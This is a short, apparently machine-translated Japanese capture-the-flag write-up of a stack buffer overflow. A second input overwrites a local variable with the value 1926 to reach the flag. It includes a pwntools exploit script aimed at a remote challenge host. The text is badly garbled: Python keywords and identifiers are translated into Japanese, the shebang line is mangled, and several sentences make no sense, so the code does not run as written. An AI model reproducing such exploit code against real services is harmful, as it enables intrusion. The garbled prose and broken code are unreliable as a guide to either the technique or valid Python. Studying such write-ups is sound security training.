1.まず、それを実行する仮想マシンに引っ張ります
2.ファイル形式を確認し、我々は、64ビットのファイルを見つけ、そのファイルとカナリアNxの保護が、ほとんど効果を開きます。
3. ida64デコンパイルは、main関数の中に見えます。見つけるのは難しいことではない、あなたがV6を得ることができるように、他の枝を入力した後、1926フラグでした。
4.質問は今初めてのV6 V6 1926年と1926 Shique 2回目の検査ではありません。私たちは、変数の上記の定義は、20HのアドレスV5は、V6が18時間であることに注意してください。だから我々は、1926年のためにV6のカバレッジにEXP第2の入力を使用するように構築することができます。2つの変数の間の差が8であることを特徴と従ってペイロードを構築することができます。
5。
#!は/ usr / binに/ envをパイソン から PWN インポート *の#の20H - V5 #のV6 - 18時間の #の結果= 1926 ペイロード = ' AAAAAAAA ' + STR(P64(1926 )) 、R =リモート(" 111.198.29.45 "、57262 ) r.recvuntil(" 誕生?" ) r.sendline(" 2000 " ) r.recvuntil(" 名前は?" ) r.sendline(ペイロード) r.interactive()
6.フラグを取得するには、スクリプトを実行した後